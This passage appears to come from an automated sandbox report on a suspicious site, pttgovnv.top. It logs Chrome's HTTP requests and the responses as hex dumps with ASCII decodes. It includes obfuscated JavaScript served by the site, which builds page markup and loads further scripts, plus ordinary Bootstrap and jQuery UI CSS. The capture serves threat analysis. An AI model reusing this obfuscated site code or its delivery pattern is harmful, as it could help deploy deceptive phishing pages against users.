    Data Ascii: 20values'+_0x1457f1(0x5be)+_0x1457f1(0x663)+'\x22\x20dur=\x221s\x22'+'\x20begin=\x22-0'+_0x1457f1(0x3ff)+_0x1457f1(0x457)+'repeatCoun'+'t=\x22indefin'+_0x1457f1(0x1f2)+_0x1457f1(0x3fe)+_0x1457f1(0x384)+_0x1457f1(0x183)+'m=\x22rotate('+_0x1457f1(0x544)+_0x
    2024-09-01 22:28:23 UTC1369INData Raw: 33 36 38 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 30 38 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 33 66 61 29 2b 27 69 67 68 74 3d 5c 78 32 32 31 32 5c 78 32 32 5c 78 32 30 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 31 35 37 29 29 2b 28 5f 30 78 66 33 32 30 35 30 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 78 30 3a 5f 30 78 66 33 32 30 35 30 5b 5f 30 78 31 34 35 37 66 31 28 30 78 34 61 65 29 2b 27 74 65 27 5d 28 5f 30 78 31 34 35 37 66 31 28 30 78 35 62 63 29 29 29 2b 28 5f 30 78 31 34 35 37 66 31 28 30 78 32 36 32 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 66 32 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 32 37 64 29 2b 27 61 6d 65 3d 5c 78 32 32 6f 70 61 63 69 27 2b 27 74 79 5c 78 32 32 5c 78 32 30 76 61 6c 75 65 73 27 2b 5f 30 78 31 34 35 37 66 31 28 30
    Data Ascii: 368)+_0x1457f1(0x408)+_0x1457f1(0x3fa)+'ight=\x2212\x22\x20'+_0x1457f1(0x157))+(_0xf32050==null?void 0x0:_0xf32050[_0x1457f1(0x4ae)+'te'](_0x1457f1(0x5bc)))+(_0x1457f1(0x262)+_0x1457f1(0x4f2)+_0x1457f1(0x27d)+'ame=\x22opaci'+'ty\x22\x20values'+_0x1457f1(0
    2024-09-01 22:28:23 UTC1369INData Raw: 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 36 33 29 2b 27 5c 78 32 32 5c 78 32 30 64 75 72 3d 5c 78 32 32 31 73 5c 78 32 32 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 30 30 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 37 64 29 2b 27 74 43 6f 75 6e 74 3d 5c 78 32 32 69 6e 27 2b 27 64 65 66 69 6e 69 74 65 5c 78 32 32 2f 27 2b 27 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 27 2b 27 72 65 63 74 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 32 30 36 29 2b 27 6e 73 66 6f 72 6d 3d 5c 78 32 32 72 6f 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 36 61 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 65 63 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 31 36 33 29
    Data Ascii: '+_0x1457f1(0x663)+'\x22\x20dur=\x221s\x22'+_0x1457f1(0x600)+_0x1457f1(0x67d)+'tCount=\x22in'+'definite\x22/'+'>\x0a\x20\x20\x20\x20\x20\x20</'+'rect>\x0a\x20\x20\x20\x20'+_0x1457f1(0x206)+'nsform=\x22ro'+_0x1457f1(0x46a)+_0x1457f1(0x6ec)+_0x1457f1(0x163)
    2024-09-01 22:28:23 UTC1369INData Raw: 66 31 28 30 78 31 37 66 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 64 36 29 2b 27 5c 78 32 32 5c 78 32 30 79 3d 5c 78 32 32 32 34 5c 78 32 32 5c 78 32 30 72 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 34 65 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 33 64 29 2b 27 36 5c 78 32 32 5c 78 32 30 68 65 69 67 68 74 3d 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 39 32 29 2b 27 5c 78 32 32 27 29 2b 28 5f 30 78 66 33 32 30 35 30 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 78 30 3a 5f 30 78 66 33 32 30 35 30 5b 5f 30 78 31 34 35 37 66 31 28 30 78 34 61 65 29 2b 27 74 65 27 5d 28 5f 30 78 31 34 35 37 66 31 28 30 78 35 62 63 29 29 29 2b 28 5f 30 78 31 34 35 37 66 31 28 30 78 32 36 32 29 2b 27 5c 78 32 30 3c 61 6e 69 6d 61 74 65 5c 78 32 30 27 2b 27 61 74 74 72 69 62
    Data Ascii: f1(0x17f)+_0x1457f1(0x6d6)+'\x22\x20y=\x2224\x22\x20r'+_0x1457f1(0x44e)+_0x1457f1(0x63d)+'6\x22\x20height='+_0x1457f1(0x692)+'\x22')+(_0xf32050==null?void 0x0:_0xf32050[_0x1457f1(0x4ae)+'te'](_0x1457f1(0x5bc)))+(_0x1457f1(0x262)+'\x20<animate\x20'+'attrib
    2024-09-01 22:28:23 UTC1369INData Raw: 31 34 35 37 66 31 28 30 78 35 65 62 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 35 62 65 29 2b 27 54 69 6d 65 73 3d 5c 78 32 32 30 3b 31 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 32 34 35 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 30 30 29 2b 27 2e 30 38 33 33 33 33 33 33 33 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 35 34 62 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 33 62 38 29 2b 27 6e 74 3d 5c 78 32 32 69 6e 64 65 66 69 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 39 34 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 32 65 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 32 39 31 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 35 33 66 29 2b 27 72 6d 3d 5c 78 32 32 72 6f 74 61 74 65 27 2b 27 28 33 33 30 5c 78 32 30 35 30 5c 78 32 30 35 30 27 2b 27 29 5c 78 32 32 3e 5c
    Data Ascii: 1457f1(0x5eb)+_0x1457f1(0x5be)+'Times=\x220;1'+_0x1457f1(0x245)+_0x1457f1(0x600)+'.083333333'+_0x1457f1(0x54b)+_0x1457f1(0x3b8)+'nt=\x22indefi'+_0x1457f1(0x494)+_0x1457f1(0x42e)+_0x1457f1(0x291)+_0x1457f1(0x53f)+'rm=\x22rotate'+'(330\x2050\x2050'+')\x22>\


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    11192.168.2.449752104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:23 UTC364OUTGET /help/assets/77985128JxKnW.js HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:24 UTC758INHTTP/1.1 200 OK
    Date: Sun, 01 Sep 2024 22:28:23 GMT
    Content-Type: application/javascript; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=86400
    Last-Modified: Wed, 29 May 2024 10:14:42 GMT
    ETag: W/"1264-18fc3d84650"
    CF-Cache-Status: HIT
    Age: 34357
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EmoAVz19%2B6aeZYUVe7f7aHSeJXwQ7G1CRsBYkR3WJhUeIdVQvQ%2Fk7A8hYdhmAJa3Je33YSUNExAI8gzCnpDihQ7y4%2Fyc02STSXaAAZ4hjaTu6HFpsmqM7wVkvp98zg4%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b171beb1c342-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:24 UTC611INData Raw: 31 32 36 34 0d 0a 63 6f 6e 73 74 20 61 31 36 5f 30 78 31 61 30 61 62 31 3d 61 31 36 5f 30 78 62 33 30 39 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 63 36 32 30 32 37 2c 5f 30 78 34 63 33 35 30 33 29 7b 63 6f 6e 73 74 20 5f 30 78 34 37 32 35 31 37 3d 61 31 36 5f 30 78 62 33 30 39 2c 5f 30 78 31 38 66 32 38 38 3d 5f 30 78 63 36 32 30 32 37 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 31 30 61 36 34 62 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 37 32 35 31 37 28 30 78 31 34 62 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 37 32 35 31 37 28 30 78 31 33 66 29 29 2f 30 78 32 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 37 32 35 31 37 28 30 78 31 32 64 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78
    Data Ascii: 1264const a16_0x1a0ab1=a16_0xb309;(function(_0xc62027,_0x4c3503){const _0x472517=a16_0xb309,_0x18f288=_0xc62027();while(!![]){try{const _0x10a64b=parseInt(_0x472517(0x14b))/0x1+-parseInt(_0x472517(0x13f))/0x2+parseInt(_0x472517(0x12d))/0x3+-parseInt(_0x
    2024-09-01 22:28:24 UTC1369INData Raw: 34 36 38 31 2c 30 78 36 65 62 66 36 29 29 3b 63 6f 6e 73 74 20 61 31 36 5f 30 78 61 61 35 39 66 37 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 5f 30 78 34 31 30 62 64 31 3d 21 21 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 65 35 63 30 37 2c 5f 30 78 33 31 63 63 34 35 29 7b 63 6f 6e 73 74 20 5f 30 78 35 63 32 31 65 37 3d 5f 30 78 34 31 30 62 64 31 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 33 61 61 36 61 36 3d 61 31 36 5f 30 78 62 33 30 39 3b 69 66 28 5f 30 78 33 31 63 63 34 35 29 7b 63 6f 6e 73 74 20 5f 30 78 32 31 66 34 32 38 3d 5f 30 78 33 31 63 63 34 35 5b 5f 30 78 33 61 61 36 61 36 28 30 78 31 32 34 29 5d 28 5f 30 78 33 65 35 63 30 37 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30 78
    Data Ascii: 4681,0x6ebf6));const a16_0xaa59f7=(function(){let _0x410bd1=!![];return function(_0x3e5c07,_0x31cc45){const _0x5c21e7=_0x410bd1?function(){const _0x3aa6a6=a16_0xb309;if(_0x31cc45){const _0x21f428=_0x31cc45[_0x3aa6a6(0x124)](_0x3e5c07,arguments);return _0x
    2024-09-01 22:28:24 UTC1369INData Raw: 20 61 31 36 5f 30 78 31 34 61 66 66 62 2c 62 20 61 73 20 61 31 36 5f 30 78 31 39 63 39 36 38 7d 66 72 6f 6d 27 2e 2f 33 37 64 38 65 62 33 31 4a 78 4b 6e 57 2e 6a 73 27 3b 63 6f 6e 73 74 20 6f 3d 64 6f 63 75 6d 65 6e 74 5b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 35 31 29 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 64 29 5d 28 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 33 64 29 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 33 36 29 29 3b 66 75 6e 63 74 69 6f 6e 20 61 31 36 5f 30 78 62 33 30 39 28 5f 30 78 31 31 63 64 63 35 2c 5f 30 78 33 33 66 61 37 61 29 7b 63 6f 6e 73 74 20 5f 30 78 31 31 38 66 33 63 3d 61 31 36 5f 30 78 34 36 38 31 28 29 3b 72 65 74 75 72 6e 20 61 31 36 5f 30 78 62 33 30 39 3d 66 75 6e 63 74 69 6f 6e 28 5f 30
    Data Ascii: a16_0x14affb,b as a16_0x19c968}from'./37d8eb31JxKnW.js';const o=document[a16_0x1a0ab1(0x151)+a16_0x1a0ab1(0x14d)](a16_0x1a0ab1(0x13d)+a16_0x1a0ab1(0x136));function a16_0xb309(_0x11cdc5,_0x33fa7a){const _0x118f3c=a16_0x4681();return a16_0xb309=function(_0
    2024-09-01 22:28:24 UTC1367INData Raw: 37 36 63 66 27 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 39 29 2c 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 33 33 29 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 35 30 29 2c 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 37 29 2b 27 6b 46 47 79 6d 2e 63 73 73 27 2c 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 63 29 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 39 29 2c 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 33 31 29 2b 27 4a 78 4b 6e 57 2e 6a 73 27 2c 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 65 29 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 39 29 2c 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 32 63 29 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 39 29 2c 61 31 36 5f 30 78
    Data Ascii: 76cf'+a16_0x1a0ab1(0x149),a16_0x1a0ab1(0x133)+a16_0x1a0ab1(0x150),a16_0x1a0ab1(0x147)+'kFGym.css',a16_0x1a0ab1(0x14c)+a16_0x1a0ab1(0x149),a16_0x1a0ab1(0x131)+'JxKnW.js',a16_0x1a0ab1(0x14e)+a16_0x1a0ab1(0x149),a16_0x1a0ab1(0x12c)+a16_0x1a0ab1(0x149),a16_0x
    2024-09-01 22:28:24 UTC5INData Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    12192.168.2.449756104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:23 UTC557OUTGET /help/assets/2dd339f2kFGym.css HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: text/css,*/*;q=0.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: style
    Referer: https://pttgovnv.top/help/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:24 UTC744INHTTP/1.1 200 OK
    Date: Sun, 01 Sep 2024 22:28:24 GMT
    Content-Type: text/css; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=86400
    Last-Modified: Wed, 29 May 2024 10:14:42 GMT
    ETag: W/"d0ef-18fc3d84650"
    CF-Cache-Status: HIT
    Age: 37245
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0E8DTPlr%2FHrDFueiKJFtgdwT5QSXP3rFr2eZsjX5iGs3DbJFX%2FgXgE0gKkiYBO1uy5xyZMxBq35pgHiMyTa1VQ%2BQAII3zdIYGCHRnYO2LpABotW38zXYuyIqYNKPXWk%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b1722856435e-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:24 UTC625INData Raw: 37 63 63 38 0d 0a 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 39 30 70 78 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 39 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 34 37 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 38 30 70 78 7d 7d 62 6f 64 79 20 23 73 34 2d 72 69 62 62 6f 6e 72 6f 77 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 34 36 38 70 78 29 7b 23 77 65 62 6f 62 6a 5f 70 6f 72 74 61 6c 7b 70 61 64 64
    Data Ascii: 7cc8@media screen and (min-width: 767px){.main-content{margin-top:90px}}@media screen and (min-width: 769px) and (max-width: 1047px){.main-content{margin-top:180px}}body #s4-ribbonrow{display:none}@media screen and (max-width: 468px){#webobj_portal{padd
    2024-09-01 22:28:24 UTC1369INData Raw: 70 78 7d 69 6e 70 75 74 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 65 73 65 74 5d 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 68 6f 76 65 72 2c 62 75 74 74 6f 6e 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 32 63 30 65 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 36 66 32 66 61 7d 69 6e 70 75 74 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 3a 61 63 74 69 76 65 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 65 73 65 74 5d 3a 61 63 74 69 76 65 2c 69 6e 70 75 74 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 61 63 74 69 76 65 2c 62 75 74 74 6f 6e 3a 61 63 74 69 76 65 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 61 38 64 64 34 3b 62 61 63 6b 67 72 6f
    Data Ascii: px}input[type=button]:hover,input[type=reset]:hover,input[type=submit]:hover,button:hover{border-color:#92c0e0;background-color:#e6f2fa}input[type=button]:active,input[type=reset]:active,input[type=submit]:active,button:active{border-color:#2a8dd4;backgro
    2024-09-01 22:28:24 UTC1369INData Raw: 70 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 2a 20 49 6e 63 6c 75 64 65 73 3a 20 63 6f 72 65 2e 63 73 73 2c 20 61 63 63 6f 72 64 69 6f 6e 2e 63 73 73 2c 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2e 63 73 73 2c 20 6d 65 6e 75 2e 63 73 73 2c 20 62 75 74 74 6f 6e 2e 63 73 73 2c 20 63 6f 6e 74 72 6f 6c 67 72 6f 75 70 2e 63 73 73 2c 20 63 68 65 63 6b 62 6f 78 72 61 64 69 6f 2e 63 73 73 2c 20 64 61 74 65 70 69 63 6b 65 72 2e 63 73 73 2c 20 64 69 61 6c 6f 67 2e 63 73 73 2c 20 64 72 61 67 67 61 62 6c 65 2e 63 73 73 2c 20 72 65 73 69 7a 61 62 6c 65 2e 63 73 73 2c 20 70 72 6f 67 72 65 73 73 62 61 72 2e 63 73 73 2c 20 73 65 6c 65 63 74 61 62 6c 65 2e 63 73 73 2c 20 73 65 6c 65 63 74 6d 65 6e 75 2e 63 73 73 2c 20 73 6c 69 64 65 72 2e 63 73 73 2c 20 73 6f 72 74 61
    Data Ascii: p://jqueryui.com* Includes: core.css, accordion.css, autocomplete.css, menu.css, button.css, controlgroup.css, checkboxradio.css, datepicker.css, dialog.css, draggable.css, resizable.css, progressbar.css, selectable.css, selectmenu.css, slider.css, sorta
    2024-09-01 22:28:24 UTC1369INData Raw: 69 6c 74 65 72 53 68 61 64 6f 77 3d 41 6c 70 68 61 28 4f 70 61 63 69 74 79 25 33 44 33 30 29 26 6f 70 61 63 69 74 79 46 69 6c 74 65 72 4f 76 65 72 6c 61 79 3d 41 6c 70 68 61 28 4f 70 61 63 69 74 79 25 33 44 33 30 29 26 6f 70 61 63 69 74 79 53 68 61 64 6f 77 50 65 72 63 3d 33 30 26 6f 70 61 63 69 74 79 4f 76 65 72 6c 61 79 50 65 72 63 3d 33 30 26 69 63 6f 6e 43 6f 6c 6f 72 48 6f 76 65 72 3d 25 32 33 35 35 35 35 35 35 26 69 63 6f 6e 43 6f 6c 6f 72 48 69 67 68 6c 69 67 68 74 3d 25 32 33 37 37 37 36 32 30 26 69 63 6f 6e 43 6f 6c 6f 72 48 65 61 64 65 72 3d 25 32 33 34 34 34 34 34 34 26 69 63 6f 6e 43 6f 6c 6f 72 45 72 72 6f 72 3d 25 32 33 63 63 30 30 30 30 26 69 63 6f 6e 43 6f 6c 6f 72 44 65 66 61 75 6c 74 3d 25 32 33 37 37 37 37 37 37 26 69 63 6f 6e 43 6f 6c
    Data Ascii: ilterShadow=Alpha(Opacity%3D30)&opacityFilterOverlay=Alpha(Opacity%3D30)&opacityShadowPerc=30&opacityOverlayPerc=30&iconColorHover=%23555555&iconColorHighlight=%23777620&iconColorHeader=%23444444&iconColorError=%23cc0000&iconColorDefault=%23777777&iconCol
    2024-09-01 22:28:24 UTC1369INData Raw: 76 65 72 3d 25 32 33 65 64 65 64 65 64 26 66 63 44 65 66 61 75 6c 74 3d 25 32 33 34 35 34 35 34 35 26 62 6f 72 64 65 72 43 6f 6c 6f 72 44 65 66 61 75 6c 74 3d 25 32 33 63 35 63 35 63 35 26 62 67 43 6f 6c 6f 72 44 65 66 61 75 6c 74 3d 25 32 33 66 36 66 36 66 36 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 3b 20 4c 69 63 65 6e 73 65 64 20 4d 49 54 20 2a 2f 2e 75 69 2d 74 61 62 73 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 70 61 64 64 69 6e 67 3a 2e 32 65 6d 7d 2e 75 69 2d 77 69 64 67 65 74 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a
    Data Ascii: ver=%23ededed&fcDefault=%23454545&borderColorDefault=%23c5c5c5&bgColorDefault=%23f6f6f6* Copyright jQuery Foundation and other contributors; Licensed MIT */.ui-tabs{position:relative;padding:.2em}.ui-widget{font-family:Arial,Helvetica,sans-serif;font-siz
    2024-09-01 22:28:24 UTC1369INData Raw: 6e 65 7d 61 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 74 68 69 6e 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d 77 65 62 6b 69 74 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 63 6f 6c 6f 72 3b 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 2d 32 70 78 7d 69 6d 67 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 73 72 2d 6f 6e 6c 79 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 70 78 3b 68 65 69 67 68 74 3a 31 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 2d 31 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 63 6c 69 70 3a 72 65 63 74 28 30 2c 30 2c 30 2c 30 29 3b 62 6f 72 64 65 72 3a 30 7d 68 31 2c 68 33 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65
    Data Ascii: ne}a:focus{outline:thin dotted;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}img{vertical-align:middle}.sr-only{position:absolute;width:1px;height:1px;padding:0;margin:-1px;overflow:hidden;clip:rect(0,0,0,0);border:0}h1,h3{font-family:inhe
    2024-09-01 22:28:24 UTC1369INData Raw: 38 2e 33 33 33 33 33 33 33 33 25 7d 7d 2e 63 6f 6c 6c 61 70 73 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 31 30 30 25 3b 6c 65 66 74 3a 30 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 36 30 70 78 3b 6d 61 72 67 69 6e 3a 32 70 78 20 30 20 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6c 69 70 3a 70 61 64 64 69 6e
    Data Ascii: 8.33333333%}}.collapse{display:none;visibility:hidden}.dropdown-menu{position:absolute;top:100%;left:0;z-index:1000;display:none;float:left;min-width:160px;margin:2px 0 0;text-align:left;list-style:none;background-color:#fff;-webkit-background-clip:paddin
    2024-09-01 22:28:24 UTC1369INData Raw: 62 61 72 2d 63 6f 6c 6c 61 70 73 65 2e 63 6f 6c 6c 61 70 73 65 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 6e 61 76 62 61 72 2d 73 74 61 74 69 63 2d 74 6f 70 20 2e 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 7d 7d 2e 6e 61 76 62 61 72 2d 73 74 61 74 69 63 2d 74 6f 70 7b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 20 30 20 31 70 78 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 36 38 70 78 29 7b 2e 6e 61 76 62 61 72 2d 73 74 61 74 69 63 2d 74 6f 70 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 7d 2e 6e 61 76 62 61 72 2d 62 72 61 6e 64 3a 66 6f 63 75 73 2c 2e 6e 61 76 62 61 72 2d 62 72 61 6e 64 3a
    Data Ascii: bar-collapse.collapse{padding-bottom:0}.navbar-static-top .navbar-collapse{padding-right:0;padding-left:0}}.navbar-static-top{z-index:1000;border-width:0 0 1px}@media (min-width:768px){.navbar-static-top{border-radius:0}}.navbar-brand:focus,.navbar-brand:
    2024-09-01 22:28:24 UTC1369INData Raw: 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 20 2e 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 3a 66 6f 63 75 73 2c 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 20 2e 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 33 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 20 2e 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 20 2e 69 63 6f 6e 2d 62 61 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 20 2e 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 7b 62 6f 72 64
